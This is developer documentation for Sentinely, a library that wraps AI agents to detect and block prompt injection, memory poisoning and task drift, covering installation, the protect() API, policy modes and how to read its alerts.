DOCUMENTATION
Sentinely Docs
Everything you need to protect your AI agents from prompt injection, memory poisoning, and drift.
Quick Start
Protect your AI agent in 3 lines of code. No configuration required to get started.
Install the package
pip install sentinely
Wrap your agent
from sentinel import protect
# Wrap any AI agent in one line
agent = protect(
your_agent,
task="Summarize quarterly reports"
)Add your API key
# .env
SENTINELY_API_KEY=sntnl_live_...
SENTINELY_API_URL=https://api.sentinely.aiTHAT'S IT
Your agent is now protected. Sentinely monitors every action, blocks attacks automatically, and streams events to your dashboard in real time — no additional code required.
Installation
Python 3.10+ or Node.js 18+.
pip install sentinely
Requirements
| PACKAGE | VERSION | PURPOSE |
|---|---|---|
httpx | ≥ 0.27.0 | Async HTTP to Sentinely API |
pydantic | ≥ 2.0.0 | Data validation |
python-dotenv | ≥ 1.0.0 | Environment variable loading |
Configuration
Sentinely is configured via environment variables. Create a .env file in your project root.
# Required — get this from your dashboard
SENTINELY_API_KEY=sntnl_live_...
# Optional — defaults shown
SENTINELY_API_URL=https://api.sentinely.ai
SENTINELY_ENV=production| VARIABLE | REQUIRED | DEFAULT | DESCRIPTION |
|---|---|---|---|
SENTINELY_API_KEY | Yes | — | Your API key. Get it from Settings → API Keys. |
SENTINELY_API_URL | No | https://api.sentinely.ai | API base URL. Only change for self-hosted. |
SENTINELY_ENV | No | development | Set to production to enable event forwarding. |
Never commit your SENTINELY_API_KEY to version control. Add .env to your .gitignore file.
protect()
The single entry-point for all Sentinely protection. Returns a ProtectedAgent that wraps your agent.
from sentinel import protect
protected = protect(
agent, # Any agent object
task, # str — the agent's mission / system prompt
policy="strict", # "strict" | "monitor" | "permissive"
agent_id=None, # Optional str — stable ID across restarts
org_id=None, # Optional str — your organisation slug
tracker=None, # Optional MultiAgentTracker
)PARAMETERS
| PARAMETER | TYPE | REQUIRED | DESCRIPTION |
|---|---|---|---|
agent | object | Yes | Any agent that exposes .run(), .invoke(), .ainvoke(), or __call__(). |
task | str | Yes | The agent's purpose / system prompt. Used as the baseline for drift detection. |
policy | str | No | "strict" blocks dangerous actions. "monitor" logs only. "permissive" allows with warnings. |
agent_id | str | No | Stable identifier. Defaults to a random hex ID. Use a fixed value to correlate sessions. |
org_id | str | No | Organisation slug. Defaults to "local". Visible in the dashboard under your org. |
tracker | MultiAgentTracker | No | Pass a tracker to enable inter-agent drift monitoring across agent boundaries. |
RETURNS
A ProtectedAgent instance that is a transparent proxy to your original agent. It exposes the same interface:
.invoke(input)Async — scan input → run agent → return result.ainvoke(input)Async version of .invoke().run(input)Sync wrapper — runs the async pipeline via event loop.__call__(input)Callable shorthand — delegates to .invoke().score_action(tool, params)Score a pending tool call — call from your tool hooks.memoryAccess the MemoryFirewall for poisoning detection.get_audit_log()Return all events buffered locally this sessionEXAMPLE
import asyncio
from sentinel import protect
agent = protect(
my_agent,
task="Analyse customer churn data. Read-only. No external API calls.",
policy="strict",
agent_id="churn-analyst-v2",
session_id="session-abc123"
)
# Synchronous
result = agent.run("Analyse churn for Q3")
# Async
result = await agent.ainvoke("Analyse churn for Q3")
# As callable
result = agent("Analyse churn for Q3")COMING SOON
Native Python adapters for CrewAI, AutoGen and LlamaIndex. Sentinely will plug directly into your existing agent framework with zero code changes.
Policy Modes
Choose the enforcement level that matches your deployment stage. You can change the policy at any time without restarting.
Blocks any action that scores above the risk threshold. Raises SentinelBlockedError so you can handle it gracefully. Recommended for production.
policy="strict"Logs and scores every action but never blocks execution. Use during development or when rolling out Sentinely to an existing agent without changing its behaviour.
policy="monitor"Allows all actions but attaches risk scores and reasons to each event. Useful for research, red-teaming, or building a baseline before switching to strict.
policy="permissive"HANDLING BLOCKS
from sentinel.exceptions import SentinelBlockedError
try:
result = agent.run(user_input)
except SentinelBlockedError as e:
print(f"Blocked: {e.reason}")
print(f"Risk score: {e.risk_score}")
print(f"Attack type: {e.attack_type}")
# Return a safe fallback response to the userFramework Examples
Sentinely works with any Python or Node.js AI agent framework. Select your framework below.
from openai import OpenAI
from sentinel import protect
client = OpenAI()
class MyAgent:
def run(self, prompt):
response = client.chat.completions.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response.choices[0].message.content
agent = MyAgent()
agent = protect(
agent,
task="Answer customer support questions about billing",
policy="strict",
agent_id="openai-support-agent"
)
result = agent.run("How do I update my payment method?")LangChain Integration
Sentinely integrates natively with LangChain. Choose the approach that fits your architecture.
INSTALLATION
pip install sentinely[langchain]
THREE APPROACHES
Wrap individual tools. Blocked calls return a safe string instead of throwing — great for graceful degradation.
Attach to any LangChain agent executor. Throws SentinelyBlockedError on block, halting the agent.
One-liner convenience wrapper. Mirrors the Python protect_langchain() API — installs the callback and returns the agent.
CODE EXAMPLES
from sentinely import SentinelyTool, SentinelyCallbackHandler, protect_langchain
# Option 1 — Tool wrapper (per-tool protection)
safe_tool = SentinelyTool(
tool=your_tool,
task="Summarise quarterly reports",
policy="strict",
)
# Option 2 — Agent-wide callback
agent = initialize_agent(
tools, llm,
callbacks=[SentinelyCallbackHandler(
task="Summarise quarterly reports",
policy="strict",
agent_id="my-agent",
)],
)
# Option 3 — Convenience wrapper (recommended)
agent = protect_langchain(
agent,
task="Summarise quarterly reports",
policy="strict",
agent_id="my-agent",
)LangChain is an optional dependency. Python: pip install sentinely[langchain] installs the extras. Node.js: install langchain and @langchain/core separately — they are peer dependencies.
Understanding Alerts
Every action your agent takes gets a risk score from 0–100. Here is how to read what Sentinely is telling you.
RISK SCORE
Action is within normal operating bounds. Agent is behaving as expected.
Action looks suspicious. Logged and surfaced in your dashboard. Agent continues but you should review.
Action is blocked. Agent receives an error. Slack/email alerts fire. Item appears in Quarantine if memory-related.
ATTACK TYPES
Malicious instructions embedded in external content trying to hijack the agent's behavior. Most common attack vector.
Attempts to write malicious instructions into the agent's long-term memory to influence future sessions.
Agent's actions gradually deviate from its original task. Often a sign of a slow multi-step manipulation.
One agent attempts to manipulate another in a multi-agent pipeline. Detected by behavioral fingerprinting.
DRIFT SCORE
FAQ
Common questions about Sentinely.